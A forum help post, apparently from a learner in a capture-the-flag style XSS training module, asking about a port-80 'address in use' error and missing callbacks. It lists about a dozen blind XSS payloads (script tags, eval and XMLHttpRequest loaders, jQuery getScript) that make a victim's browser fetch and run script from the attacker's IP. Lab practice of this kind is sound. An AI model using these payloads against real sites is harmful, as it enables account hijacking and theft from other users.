Hi guys, I’m learning CROSS-SITE SCRIPTING (XSS) from Bug Bounty Hunter.
I got some question and I can’t pass this section.
Q1: Failed to listen on 0.0.0.0:80 (reason: Address already in use)
I start a php server to waiting a call back from the <script> tags.
And I spent a lot of time trying to solve this problem, and then implemented PHP port 80 booting in my Kali via VPN Config, and Pwnbox still didn’t work.
Q2: Can’t get call back from what I was coding.
This is XSS section, and I follow the guide. WhenI submit the form, nothing happen.
<script src=http://10.10.14.11/fullname></script>
<script src=http://10.10.14.11/username></script>
<script src=http://10.10.14.11/imageurl></script>
<script src=http://10.10.14.11></script>
'><script src=http://10.10.14.11></script>
"><script src=http://10.10.14.11></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'http://10.10.14.11\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//10.10.14.11");a.send();</script>
<script>$.getScript("http://10.10.14.11")</script>
<script src="http://10.10.14.11/script.js"></script>
'><script src="http://10.10.14.11/script.js"></script>
"><script src="http://10.10.14.11/script.js"></script>
I do need some suggest. And thanks for your help.